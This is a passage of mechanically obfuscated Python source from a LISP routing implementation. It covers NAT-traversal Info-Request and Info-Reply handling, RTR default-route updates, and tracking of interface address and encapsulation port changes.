if 19 - 19: iIii1I11I1II1 + IiII * I11i * II111iiii + o0oOOo0O0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 . II111iiii
if 36 - 36: I1IiiI * i1IIi + OoOoOO00
if 63 - 63: OoOoOO00 - iII111i
if 83 - 83: i1IIi / iII111i % ooOoO0o % i11iIiiIii + I1ii11iIi11i
if 82 - 82: iIii1I11I1II1 / OOooOOo
if 7 - 7: OoooooooOO
if 71 - 71: OOooOOo * Oo0Ooo . Oo0Ooo % iIii1I11I1II1
if 56 - 56: IiII * iIii1I11I1II1 - iIii1I11I1II1 . O0
O00o0 = False
if ( device_name ) :
ooOoo000OoO0O = lisp_get_host_route_next_hop ( oo0o00OO )
if 52 - 52: OoooooooOO - OoO0O00
if 24 - 24: iII111i / Oo0Ooo - I1ii11iIi11i + o0oOOo0O0Ooo
if 44 - 44: OoOoOO00 + I1IiiI . I1ii11iIi11i / i1IIi + II111iiii . Oo0Ooo
if 39 - 39: o0oOOo0O0Ooo
if 64 - 64: oO0o - i11iIiiIii
if 62 - 62: OoooooooOO - OoooooooOO / OoO0O00 - II111iiii . iIii1I11I1II1
if 2 - 2: O0 + o0oOOo0O0Ooo % OOooOOo . ooOoO0o % i1IIi
if 21 - 21: OoOoOO00 / OoooooooOO + I1Ii111 - IiII
if 62 - 62: Oo0Ooo % iII111i + OoooooooOO - I1ii11iIi11i % iII111i % iIii1I11I1II1
if ( port == LISP_CTRL_PORT and ooOoo000OoO0O != None ) :
while ( True ) :
time . sleep ( .01 )
ooOoo000OoO0O = lisp_get_host_route_next_hop ( oo0o00OO )
if ( ooOoo000OoO0O == None ) : break
if 54 - 54: IiII + OoOoOO00 / II111iiii % i11iIiiIii . I1Ii111
if 69 - 69: i1IIi + ooOoO0o + Ii1I
if 88 - 88: OoOoOO00 + iII111i % O0 + OOooOOo / OoooooooOO / OOooOOo
O0o00o000 = lisp_get_default_route_next_hops ( )
for OoO0o0OOOO , II11111Iii1I in O0o00o000 :
if ( OoO0o0OOOO != device_name ) : continue
if 70 - 70: o0oOOo0O0Ooo - O0 % I1ii11iIi11i
if 28 - 28: I1Ii111 % iII111i
if 18 - 18: OoOoOO00
if 42 - 42: Ii1I . OOooOOo / O0 / i1IIi . i11iIiiIii
if 62 - 62: OoOoOO00
if 6 - 6: OoO0O00 * ooOoO0o . oO0o
if ( ooOoo000OoO0O != II11111Iii1I ) :
if ( ooOoo000OoO0O != None ) :
lisp_install_host_route ( oo0o00OO , ooOoo000OoO0O , False )
if 77 - 77: iIii1I11I1II1
lisp_install_host_route ( oo0o00OO , II11111Iii1I , True )
O00o0 = True
if 96 - 96: iII111i * I1ii11iIi11i
break
if 77 - 77: i11iIiiIii / iIii1I11I1II1 . I1ii11iIi11i
if 90 - 90: I1IiiI + I1IiiI % oO0o
if 95 - 95: OOooOOo + OoooooooOO . i11iIiiIii * OoO0O00 * I1IiiI / I1Ii111
if 5 - 5: Ii1I . oO0o / o0oOOo0O0Ooo - OoooooooOO
if 67 - 67: I1Ii111 + i1IIi - OOooOOo + OoooooooOO / II111iiii - I1Ii111
if 13 - 13: i11iIiiIii - O0 % OoOoOO00 + OOooOOo * ooOoO0o
IiiiIi1iiii11 = I1iII . encode ( )
I1iII . print_info ( )
if 55 - 55: i1IIi - OOooOOo / I11i * Ii1I
if 20 - 20: OoOoOO00 * iIii1I11I1II1 % O0 - i1IIi
if 51 - 51: I1ii11iIi11i * Ii1I - oO0o / O0 * OoooooooOO
if 12 - 12: i1IIi / iIii1I11I1II1 / O0 * OoO0O00
IiI11 = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
IiI11 = bold ( IiI11 , False )
oo00ooOOOo0O = bold ( "{}" . format ( port ) , False )
OO0o = red ( oo0o00OO , False )
I11ii1I111Ii = "RTR " if port == LISP_DATA_PORT else "MS "
lprint ( "Send Info-Request to {}{}, port {} {}" . format ( I11ii1I111Ii , OO0o , oo00ooOOOo0O , IiI11 ) )
if 77 - 77: I1Ii111 % oO0o - ooOoO0o / OOooOOo / OoOoOO00
if 67 - 67: O0 % iII111i
if 55 - 55: I1ii11iIi11i % OOooOOo - o0oOOo0O0Ooo - II111iiii
if 52 - 52: I1Ii111
if 34 - 34: II111iiii + iII111i / IiII
if 47 - 47: OoO0O00
if ( port == LISP_CTRL_PORT ) :
lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , IiiiIi1iiii11 )
else :
O0ooOoO0 = lisp_data_header ( )
O0ooOoO0 . instance_id ( 0xffffff )
O0ooOoO0 = O0ooOoO0 . encode ( )
if ( O0ooOoO0 ) :
IiiiIi1iiii11 = O0ooOoO0 + IiiiIi1iiii11
if 40 - 40: o0oOOo0O0Ooo / iII111i . o0oOOo0O0Ooo
if 63 - 63: o0oOOo0O0Ooo * iIii1I11I1II1 * II111iiii . OoO0O00 - oO0o / OoOoOO00
if 78 - 78: i11iIiiIii / OoO0O00 / i1IIi . i11iIiiIii
if 100 - 100: II111iiii . IiII . I11i
if 60 - 60: OoOoOO00 % OOooOOo * i1IIi
if 3 - 3: OoooooooOO
if 75 - 75: OoooooooOO * I1Ii111 * o0oOOo0O0Ooo + I1ii11iIi11i . iIii1I11I1II1 / O0
if 23 - 23: oO0o - O0 * IiII + i11iIiiIii * Ii1I
if 8 - 8: ooOoO0o / II111iiii . I1ii11iIi11i * ooOoO0o % oO0o
lisp_send ( lisp_sockets , dest , LISP_DATA_PORT , IiiiIi1iiii11 )
if 36 - 36: I1ii11iIi11i % OOooOOo - ooOoO0o - I11i + I1IiiI
if 37 - 37: I1ii11iIi11i * IiII
if 65 - 65: OOooOOo / O0 . I1ii11iIi11i % i1IIi % Oo0Ooo
if 36 - 36: i11iIiiIii - OOooOOo + iII111i + iII111i * I11i * oO0o
if 14 - 14: O0 - iII111i * I1Ii111 - I1IiiI + IiII
if 46 - 46: OoooooooOO * OoO0O00 . I1Ii111
if 95 - 95: ooOoO0o . I1ii11iIi11i . ooOoO0o / I1IiiI * OoOoOO00 . O0
if ( O00o0 ) :
lisp_install_host_route ( oo0o00OO , None , False )
if ( ooOoo000OoO0O != None ) : lisp_install_host_route ( oo0o00OO , ooOoo000OoO0O , True )
if 78 - 78: oO0o
return
if 33 - 33: oO0o + i1IIi
if 32 - 32: iIii1I11I1II1
if 71 - 71: Ii1I * I1IiiI
if 62 - 62: II111iiii / I1IiiI . I1ii11iIi11i
if 49 - 49: IiII / OoOoOO00 / O0 * i11iIiiIii
if 47 - 47: i11iIiiIii + iII111i + i11iIiiIii
if 66 - 66: o0oOOo0O0Ooo . I1IiiI + OoooooooOO . iII111i / OoooooooOO - IiII
def lisp_process_info_request ( lisp_sockets , packet , addr_str , sport , rtr_list ) :
if 47 - 47: o0oOOo0O0Ooo / II111iiii * i11iIiiIii * OoO0O00 . iIii1I11I1II1
if 34 - 34: I11i / o0oOOo0O0Ooo * OOooOOo * OOooOOo
if 89 - 89: I1ii11iIi11i . OoooooooOO
if 61 - 61: i1IIi + i11iIiiIii
I1iII = lisp_info ( )
packet = I1iII . decode ( packet )
if ( packet == None ) : return
I1iII . print_info ( )
if 59 - 59: i11iIiiIii * OOooOOo + i1IIi * iIii1I11I1II1 + I11i
if 97 - 97: OoO0O00 - I11i . OoooooooOO
if 58 - 58: I1ii11iIi11i / II111iiii / i11iIiiIii
if 27 - 27: iIii1I11I1II1 - O0 + OoOoOO00
if 28 - 28: oO0o . IiII * iII111i % Oo0Ooo - OoO0O00 / I11i
I1iII . info_reply = True
I1iII . global_etr_rloc . store_address ( addr_str )
I1iII . etr_port = sport
if 67 - 67: i11iIiiIii + i11iIiiIii / ooOoO0o - o0oOOo0O0Ooo
if 94 - 94: O0 + OoO0O00 / I1IiiI * II111iiii * i11iIiiIii
if 55 - 55: OoooooooOO * O0 + i1IIi % I1IiiI
if 10 - 10: II111iiii - Ii1I . I11i . O0 + Ii1I
if 50 - 50: iIii1I11I1II1 / Ii1I . ooOoO0o / ooOoO0o * OoOoOO00 * iII111i
if ( I1iII . hostname != None ) :
I1iII . private_etr_rloc . afi = LISP_AFI_NAME
I1iII . private_etr_rloc . store_address ( I1iII . hostname )
if 15 - 15: o0oOOo0O0Ooo % II111iiii + I1IiiI
if 21 - 21: I1ii11iIi11i - ooOoO0o
if ( rtr_list != None ) : I1iII . rtr_list = rtr_list
packet = I1iII . encode ( )
I1iII . print_info ( )
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
lprint ( "Send Info-Reply to {}" . format ( red ( addr_str , False ) ) )
oo0OoO = lisp_convert_4to6 ( addr_str )
lisp_send ( lisp_sockets , oo0OoO , sport , packet )
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
if 100 - 100: oO0o . OoO0O00 . i11iIiiIii % II111iiii * IiII
if 81 - 81: OOooOOo - OOooOOo + OoOoOO00
if 19 - 19: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 + iIii1I11I1II1 % I1IiiI + ooOoO0o
oOOo00oOO00o = lisp_info_source ( I1iII . hostname , addr_str , sport )
oOOo00oOO00o . cache_address_for_info_source ( )
return
if 22 - 22: oO0o % IiII + O0 - IiII . OoOoOO00 . I1IiiI
if 71 - 71: oO0o % i11iIiiIii + I1Ii111 . OoooooooOO * i1IIi
if 85 - 85: II111iiii - Oo0Ooo . OoOoOO00 - i1IIi - I1ii11iIi11i
if 24 - 24: ooOoO0o % ooOoO0o - I1ii11iIi11i - OoO0O00 % I1IiiI
if 8 - 8: iIii1I11I1II1 - O0 - i11iIiiIii . O0
if 35 - 35: Ii1I . II111iiii % OoOoOO00
if 3 - 3: OOooOOo - OoOoOO00
if 49 - 49: IiII / i11iIiiIii
def lisp_get_signature_eid ( ) :
for ooOOo0ooo in lisp_db_list :
if ( ooOOo0ooo . signature_eid ) : return ( ooOOo0ooo )
if 84 - 84: iIii1I11I1II1 / i1IIi + OoOoOO00
return ( None )
if 40 - 40: Ii1I % OoO0O00
if 93 - 93: iII111i . I1Ii111 . oO0o % o0oOOo0O0Ooo . Oo0Ooo
if 51 - 51: OOooOOo * OoO0O00 * Oo0Ooo
if 61 - 61: II111iiii / OoOoOO00 % II111iiii / I1ii11iIi11i % I1Ii111 - i1IIi
if 26 - 26: Ii1I % IiII + I1IiiI
if 30 - 30: I1Ii111 / iII111i
if 100 - 100: I1Ii111 * i11iIiiIii - I1ii11iIi11i
if 64 - 64: I1ii11iIi11i * I1IiiI * Ii1I
def lisp_get_any_translated_port ( ) :
for ooOOo0ooo in lisp_db_list :
for i1III111 in ooOOo0ooo . rloc_set :
if ( i1III111 . translated_rloc . is_null ( ) ) : continue
return ( i1III111 . translated_port )
if 41 - 41: OoOoOO00 . OOooOOo / OoOoOO00 % iIii1I11I1II1
if 47 - 47: ooOoO0o . i11iIiiIii / OoO0O00
return ( None )
if 48 - 48: O0
if 89 - 89: i11iIiiIii % OoO0O00 . OoOoOO00 + Oo0Ooo + OoOoOO00
if 53 - 53: Ii1I / OoOoOO00 % iII111i * OoooooooOO + Oo0Ooo
if 70 - 70: OoO0O00 % OoO0O00 * OoooooooOO
if 96 - 96: ooOoO0o * Ii1I + I11i + II111iiii * I1IiiI / iII111i
if 40 - 40: OoooooooOO - I11i % OOooOOo - I1IiiI . I1IiiI + Ii1I
if 97 - 97: OOooOOo . OoooooooOO . OOooOOo . i11iIiiIii
if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
if 79 - 79: oO0o
def lisp_get_any_translated_rloc ( ) :
for ooOOo0ooo in lisp_db_list :
for i1III111 in ooOOo0ooo . rloc_set :
if ( i1III111 . translated_rloc . is_null ( ) ) : continue
return ( i1III111 . translated_rloc )
if 47 - 47: OoooooooOO - i1IIi * OOooOOo
if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
return ( None )
if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
if 8 - 8: iII111i
if 10 - 10: OoOoOO00 % I11i
if 49 - 49: oO0o % ooOoO0o + II111iiii
if 21 - 21: i1IIi + OoO0O00 . I1IiiI - Oo0Ooo
if 99 - 99: OoOoOO00
def lisp_get_all_translated_rlocs ( ) :
IIiiiI1IIi1iI1i = [ ]
for ooOOo0ooo in lisp_db_list :
for i1III111 in ooOOo0ooo . rloc_set :
if ( i1III111 . is_rloc_translated ( ) == False ) : continue
IiiIIi1 = i1III111 . translated_rloc . print_address_no_iid ( )
IIiiiI1IIi1iI1i . append ( IiiIIi1 )
if 91 - 91: i11iIiiIii
if 62 - 62: I1IiiI % OoO0O00 * IiII
return ( IIiiiI1IIi1iI1i )
if 6 - 6: o0oOOo0O0Ooo + i11iIiiIii
if 97 - 97: o0oOOo0O0Ooo % OoOoOO00 * O0 / iIii1I11I1II1 * OoO0O00 / i11iIiiIii
if 1 - 1: OoooooooOO . Ii1I
if 68 - 68: Ii1I
if 98 - 98: iII111i
if 33 - 33: OoO0O00 - ooOoO0o % O0 % iIii1I11I1II1 * iII111i - iII111i
if 27 - 27: i11iIiiIii + I1ii11iIi11i + i1IIi
if 67 - 67: o0oOOo0O0Ooo
def lisp_update_default_routes ( map_resolver , iid , rtr_list ) :
I11I111Ii1II = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 58 - 58: IiII % o0oOOo0O0Ooo + i1IIi
iIi1I = { }
for I1IIiIIIii in rtr_list :
if ( I1IIiIIIii == None ) : continue
IiiIIi1 = rtr_list [ I1IIiIIIii ]
if ( I11I111Ii1II and IiiIIi1 . is_private_address ( ) ) : continue
iIi1I [ I1IIiIIIii ] = IiiIIi1
if 24 - 24: OoooooooOO - oO0o - Oo0Ooo - o0oOOo0O0Ooo
rtr_list = iIi1I
if 73 - 73: OoOoOO00 * OOooOOo / oO0o % Oo0Ooo
oo0OOOoO00OoO = [ ]
for O0ooo0 in [ LISP_AFI_IPV4 , LISP_AFI_IPV6 , LISP_AFI_MAC ] :
if ( O0ooo0 == LISP_AFI_MAC and lisp_l2_overlay == False ) : break
if 100 - 100: IiII / i11iIiiIii * O0
if 93 - 93: iII111i - I11i . I1IiiI + I11i
if 16 - 16: o0oOOo0O0Ooo . iII111i / OoOoOO00 / i11iIiiIii - o0oOOo0O0Ooo
if 35 - 35: ooOoO0o / I1Ii111 / I1Ii111
if 19 - 19: OoO0O00 % i11iIiiIii % iIii1I11I1II1
IIII1 = lisp_address ( O0ooo0 , "" , 0 , iid )
IIII1 . make_default_route ( IIII1 )
o0o000Oo = lisp_map_cache . lookup_cache ( IIII1 , True )
if ( o0o000Oo ) :
if ( o0o000Oo . checkpoint_entry ) :
lprint ( "Updating checkpoint entry for {}" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ) )
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
elif ( o0o000Oo . do_rloc_sets_match ( rtr_list . values ( ) ) ) :
continue
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
o0o000Oo . delete_cache ( )
if 14 - 14: I1Ii111 + Oo0Ooo
if 35 - 35: i11iIiiIii * Ii1I
oo0OOOoO00OoO . append ( [ IIII1 , "" ] )
if 100 - 100: O0 . iII111i / iIii1I11I1II1
if 47 - 47: ooOoO0o + OoOoOO00
if 67 - 67: IiII - I1ii11iIi11i * i1IIi - ooOoO0o
if 91 - 91: I11i
IIi1iiIII11 = lisp_address ( O0ooo0 , "" , 0 , iid )
IIi1iiIII11 . make_default_multicast_route ( IIi1iiIII11 )
oOoo0 = lisp_map_cache . lookup_cache ( IIi1iiIII11 , True )
if ( oOoo0 ) : oOoo0 = oOoo0 . source_cache . lookup_cache ( IIII1 , True )
if ( oOoo0 ) : oOoo0 . delete_cache ( )
if 88 - 88: OoooooooOO
oo0OOOoO00OoO . append ( [ IIII1 , IIi1iiIII11 ] )
if 73 - 73: ooOoO0o % iII111i * IiII - iIii1I11I1II1 + i1IIi + o0oOOo0O0Ooo
if ( len ( oo0OOOoO00OoO ) == 0 ) : return
if 63 - 63: iIii1I11I1II1
if 88 - 88: OoooooooOO
if 23 - 23: iII111i - IiII % i11iIiiIii
if 81 - 81: OoooooooOO % OoOoOO00 / IiII / OoooooooOO + i1IIi - O0
OoO0oOOooOO = [ ]
for I11ii1I111Ii in rtr_list :
o000Oo00o = rtr_list [ I11ii1I111Ii ]
i1III111 = lisp_rloc ( )
i1III111 . rloc . copy_address ( o000Oo00o )
i1III111 . priority = 254
i1III111 . mpriority = 255
i1III111 . rloc_name = "RTR"
OoO0oOOooOO . append ( i1III111 )
if 78 - 78: OoO0O00 - ooOoO0o + Oo0Ooo % i1IIi % iIii1I11I1II1
if 69 - 69: I11i % ooOoO0o
for IIII1 in oo0OOOoO00OoO :
o0o000Oo = lisp_mapping ( IIII1 [ 0 ] , IIII1 [ 1 ] , OoO0oOOooOO )
o0o000Oo . mapping_source = map_resolver
o0o000Oo . map_cache_ttl = LISP_MR_TTL * 60
o0o000Oo . add_cache ( )
lprint ( "Add {} to map-cache with RTR RLOC-set: {}" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) , rtr_list . keys ( ) ) )
if 58 - 58: I1IiiI . II111iiii + i11iIiiIii / OOooOOo . I1ii11iIi11i / I1IiiI
OoO0oOOooOO = copy . deepcopy ( OoO0oOOooOO )
if 23 - 23: iIii1I11I1II1 / Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo / OOooOOo - o0oOOo0O0Ooo
return
if 23 - 23: IiII + IiII . OOooOOo
if 77 - 77: I1Ii111 * O0 - IiII
if 21 - 21: Oo0Ooo % Oo0Ooo % Oo0Ooo
if 15 - 15: I1IiiI + OoO0O00 . I1IiiI / OoO0O00 . o0oOOo0O0Ooo
if 72 - 72: IiII + oO0o * o0oOOo0O0Ooo
if 39 - 39: O0 + iII111i + ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I
if 62 - 62: I1Ii111 . iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I11i % i1IIi
if 72 - 72: oO0o
if 3 - 3: ooOoO0o - Oo0Ooo / iII111i
def lisp_process_info_reply ( source , packet , store ) :
if 40 - 40: IiII + oO0o
if 95 - 95: I1Ii111 % OOooOOo + Ii1I * i11iIiiIii + i11iIiiIii
if 27 - 27: i11iIiiIii - iIii1I11I1II1 % I1Ii111
if 10 - 10: i11iIiiIii - Ii1I - OoooooooOO % II111iiii
I1iII = lisp_info ( )
packet = I1iII . decode ( packet )
if ( packet == None ) : return ( [ None , None , False ] )
if 42 - 42: OoOoOO00 + iII111i % Oo0Ooo
I1iII . print_info ( )
if 25 - 25: IiII % O0 * I11i * OoOoOO00 / OoooooooOO
if 80 - 80: I1IiiI . oO0o - I1IiiI - OoOoOO00 * ooOoO0o / O0
if 54 - 54: Oo0Ooo % iIii1I11I1II1 * Oo0Ooo
if 80 - 80: I1ii11iIi11i - I1ii11iIi11i
II1i11i1 = False
for I11ii1I111Ii in I1iII . rtr_list :
oo0o00OO = I11ii1I111Ii . print_address_no_iid ( )
if ( lisp_rtr_list . has_key ( oo0o00OO ) ) :
if ( lisp_register_all_rtrs == False ) : continue
if ( lisp_rtr_list [ oo0o00OO ] != None ) : continue
if 70 - 70: iIii1I11I1II1 - i11iIiiIii * OOooOOo
II1i11i1 = True
lisp_rtr_list [ oo0o00OO ] = I11ii1I111Ii
if 17 - 17: ooOoO0o / IiII
if 4 - 4: i11iIiiIii + Ii1I - OOooOOo - i11iIiiIii - OoO0O00 . OOooOOo
if 5 - 5: I1IiiI / OoOoOO00 / i11iIiiIii
if 59 - 59: I11i - Ii1I - O0
if 7 - 7: OoooooooOO
if ( lisp_i_am_itr and II1i11i1 ) :
if ( lisp_iid_to_interface == { } ) :
lisp_update_default_routes ( source , lisp_default_iid , lisp_rtr_list )
else :
for o0OoO0000o in lisp_iid_to_interface . keys ( ) :
lisp_update_default_routes ( source , int ( o0OoO0000o ) , lisp_rtr_list )
if 13 - 13: I11i - o0oOOo0O0Ooo - O0 % Oo0Ooo - oO0o * OoOoOO00
if 76 - 76: IiII
if 88 - 88: o0oOOo0O0Ooo * II111iiii % Oo0Ooo * I1ii11iIi11i . I1IiiI % I1ii11iIi11i
if 37 - 37: OOooOOo % OoO0O00 % oO0o . I11i / OOooOOo
if 8 - 8: iIii1I11I1II1 + O0 + IiII - IiII * I1Ii111 / i1IIi
if 10 - 10: Oo0Ooo . i11iIiiIii + iIii1I11I1II1 % iII111i + i11iIiiIii
if 6 - 6: OoOoOO00 + OOooOOo + Oo0Ooo
if ( store == False ) :
return ( [ I1iII . global_etr_rloc , I1iII . etr_port , II1i11i1 ] )
if 43 - 43: IiII * iII111i . ooOoO0o / I1ii11iIi11i . ooOoO0o * II111iiii
if 30 - 30: iII111i
if 51 - 51: ooOoO0o + oO0o
if 80 - 80: O0 - I1Ii111 * Ii1I + I1ii11iIi11i % II111iiii . I11i
if 80 - 80: OoOoOO00 - OOooOOo
if 37 - 37: ooOoO0o
for ooOOo0ooo in lisp_db_list :
for i1III111 in ooOOo0ooo . rloc_set :
I1IIiIIIii = i1III111 . rloc
II1i = i1III111 . interface
if ( II1i == None ) :
if ( I1IIiIIIii . is_null ( ) ) : continue
if ( I1IIiIIIii . is_local ( ) == False ) : continue
if ( I1iII . private_etr_rloc . is_null ( ) == False and
I1IIiIIIii . is_exact_match ( I1iII . private_etr_rloc ) == False ) :
continue
if 22 - 22: I1ii11iIi11i + II111iiii / OoooooooOO % o0oOOo0O0Ooo * OoOoOO00 . Oo0Ooo
elif ( I1iII . private_etr_rloc . is_dist_name ( ) ) :
oo0O0OOooO0 = I1iII . private_etr_rloc . address
if ( oo0O0OOooO0 != i1III111 . rloc_name ) : continue
if 26 - 26: OoO0O00 % oO0o * Ii1I % OoooooooOO - oO0o
if 46 - 46: I1IiiI + OoO0O00 - O0 * O0
I11i11i1 = green ( ooOOo0ooo . eid . print_prefix ( ) , False )
o0oooOoOoOo = red ( I1IIiIIIii . print_address_no_iid ( ) , False )
if 75 - 75: OOooOOo + iIii1I11I1II1 * OOooOOo
o0O0O00oO = I1iII . global_etr_rloc . is_exact_match ( I1IIiIIIii )
if ( i1III111 . translated_port == 0 and o0O0O00oO ) :
lprint ( "No NAT for {} ({}), EID-prefix {}" . format ( o0oooOoOoOo ,
II1i , I11i11i1 ) )
continue
if 67 - 67: o0oOOo0O0Ooo - I1IiiI * iIii1I11I1II1
if 29 - 29: i1IIi / Ii1I / oO0o * iII111i
if 44 - 44: O0
if 95 - 95: OOooOOo + OOooOOo - OoOoOO00
if 83 - 83: II111iiii * ooOoO0o - O0 - i11iIiiIii
Oo0o0oO = I1iII . global_etr_rloc
o0oO0oOOO0o0 = i1III111 . translated_rloc
if ( o0oO0oOOO0o0 . is_exact_match ( Oo0o0oO ) and
I1iII . etr_port == i1III111 . translated_port ) : continue
if 19 - 19: iII111i / i1IIi * O0 - OoO0O00
lprint ( "Store translation {}:{} for {} ({}), EID-prefix {}" . format ( red ( I1iII . global_etr_rloc . print_address_no_iid ( ) , False ) ,
# ooOoO0o
I1iII . etr_port , o0oooOoOoOo , II1i , I11i11i1 ) )
if 26 - 26: oO0o - OoooooooOO + ooOoO0o + Ii1I
i1III111 . store_translated_rloc ( I1iII . global_etr_rloc ,
I1iII . etr_port )
if 52 - 52: I1IiiI
if 27 - 27: IiII . iII111i * I1ii11iIi11i
return ( [ I1iII . global_etr_rloc , I1iII . etr_port , II1i11i1 ] )
if 49 - 49: oO0o % iII111i
if 42 - 42: iII111i
if 74 - 74: Oo0Ooo / Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo
if 17 - 17: OOooOOo
if 75 - 75: Ii1I / i1IIi % I1ii11iIi11i . Ii1I
if 46 - 46: II111iiii * OoO0O00
if 77 - 77: ooOoO0o * I11i
if 85 - 85: OoO0O00 * I1Ii111 - OoooooooOO / iIii1I11I1II1 - i1IIi + Ii1I
def lisp_test_mr ( lisp_sockets , port ) :
return
lprint ( "Test Map-Resolvers" )
if 76 - 76: iII111i * OoooooooOO
ooOOoo0 = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
IiI1IiIIi = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
if 3 - 3: I11i % iII111i - I1Ii111
if 64 - 64: II111iiii + i11iIiiIii
if 62 - 62: I1ii11iIi11i - I1IiiI * i11iIiiIii % oO0o
if 63 - 63: II111iiii - Oo0Ooo
ooOOoo0 . store_address ( "10.0.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , ooOOoo0 , None )
ooOOoo0 . store_address ( "192.168.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , ooOOoo0 , None )
if 55 - 55: iIii1I11I1II1 / O0 * O0 * i11iIiiIii * OoooooooOO
if 94 - 94: II111iiii . II111iiii / OoOoOO00 % oO0o * i1IIi % Oo0Ooo
if 78 - 78: IiII - I1IiiI
if 59 - 59: oO0o + i1IIi - IiII % OOooOOo % iIii1I11I1II1
IiI1IiIIi . store_address ( "0100::1" )
lisp_send_map_request ( lisp_sockets , port , None , IiI1IiIIi , None )
IiI1IiIIi . store_address ( "8000::1" )
lisp_send_map_request ( lisp_sockets , port , None , IiI1IiIIi , None )
if 71 - 71: OoO0O00
if 72 - 72: II111iiii + o0oOOo0O0Ooo / i1IIi * Oo0Ooo / i1IIi
if 52 - 52: I1Ii111 % OoO0O00 . I1Ii111 * I1ii11iIi11i * OoOoOO00 + i1IIi
if 54 - 54: Ii1I / I1IiiI
IiiIOo0o00 = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
[ lisp_sockets , port ] )
IiiIOo0o00 . start ( )
return
if 38 - 38: II111iiii
if 59 - 59: OoooooooOO . ooOoO0o / OOooOOo - OOooOOo / iIii1I11I1II1 / oO0o
if 58 - 58: iIii1I11I1II1 - OoO0O00
if 74 - 74: o0oOOo0O0Ooo . OOooOOo
if 96 - 96: OoooooooOO
if 19 - 19: Ii1I / OoooooooOO
if 67 - 67: I1ii11iIi11i - OoooooooOO + OoooooooOO * o0oOOo0O0Ooo * iII111i
if 30 - 30: I1ii11iIi11i % Ii1I
if 2 - 2: I1IiiI . IiII . iIii1I11I1II1 - OOooOOo
if 56 - 56: OoooooooOO + I1IiiI / I11i % i11iIiiIii / o0oOOo0O0Ooo / Ii1I
if 27 - 27: oO0o
if 98 - 98: OoOoOO00 . oO0o + I1ii11iIi11i
if 14 - 14: OoooooooOO
def lisp_update_local_rloc ( rloc ) :
if ( rloc . interface == None ) : return
if 73 - 73: OoOoOO00 % o0oOOo0O0Ooo
IiiIIi1 = lisp_get_interface_address ( rloc . interface )
if ( IiiIIi1 == None ) : return
if 28 - 28: OoO0O00
iIOOOO0oO0o0 = rloc . rloc . print_address_no_iid ( )
O0OOOo000 = IiiIIi1 . print_address_no_iid ( )
if 88 - 88: I1ii11iIi11i + OoooooooOO % I1ii11iIi11i
if ( iIOOOO0oO0o0 == O0OOOo000 ) : return
if 3 - 3: I1Ii111 . O0 * OOooOOo * I11i + Ii1I * I1IiiI
lprint ( "Local interface address changed on {} from {} to {}" . format ( rloc . interface , iIOOOO0oO0o0 , O0OOOo000 ) )
if 18 - 18: iIii1I11I1II1 % ooOoO0o . o0oOOo0O0Ooo * iII111i % iII111i
if 64 - 64: I1Ii111 . I11i
rloc . rloc . copy_address ( IiiIIi1 )
lisp_myrlocs [ 0 ] = IiiIIi1
return
if 32 - 32: I1ii11iIi11i + IiII % OoOoOO00 . O0
if 70 - 70: IiII + iII111i . i11iIiiIii + OoO0O00
if 45 - 45: o0oOOo0O0Ooo - ooOoO0o
if 2 - 2: OOooOOo + iII111i * ooOoO0o + II111iiii
if 88 - 88: ooOoO0o * OoO0O00 * I1ii11iIi11i - I1IiiI * IiII * I11i
if 37 - 37: iIii1I11I1II1
if 50 - 50: o0oOOo0O0Ooo - OOooOOo * IiII % Oo0Ooo
if 81 - 81: OoooooooOO - OoOoOO00 % I1ii11iIi11i % I1ii11iIi11i + OoOoOO00
def lisp_update_encap_port ( mc ) :
for I1IIiIIIii in mc . rloc_set :
IIiiiiII = lisp_get_nat_info ( I1IIiIIIii . rloc , I1IIiIIIii . rloc_name )
if ( IIiiiiII == None ) : continue
if ( I1IIiIIIii . translated_port == IIiiiiII . port ) : continue
if 49 - 49: Ii1I + iIii1I11I1II1 . O0 * OOooOOo * OoooooooOO - OOooOOo
lprint ( ( "Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}" ) . format ( I1IIiIIIii . translated_port , IIiiiiII . port ,
# Ii1I * iIii1I11I1II1
red ( I1IIiIIIii . rloc . print_address_no_iid ( ) , False ) ,
green ( mc . print_eid_tuple ( ) , False ) ) )
if 3 - 3: OoO0O00 / i11iIiiIii % O0 * OoOoOO00 % I11i
I1IIiIIIii . store_translated_rloc ( I1IIiIIIii . rloc , IIiiiiII . port )
if 5 - 5: i1IIi + OoO0O00 % O0 + OoO0O00
return
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
if 20 - 20: IiII % iIii1I11I1II1 . iII111i + iIii1I11I1II1 + O0
if 96 - 96: I1ii11iIi11i - IiII % OoooooooOO . iII111i
if 30 - 30: Oo0Ooo . OoooooooOO / Oo0Ooo / oO0o
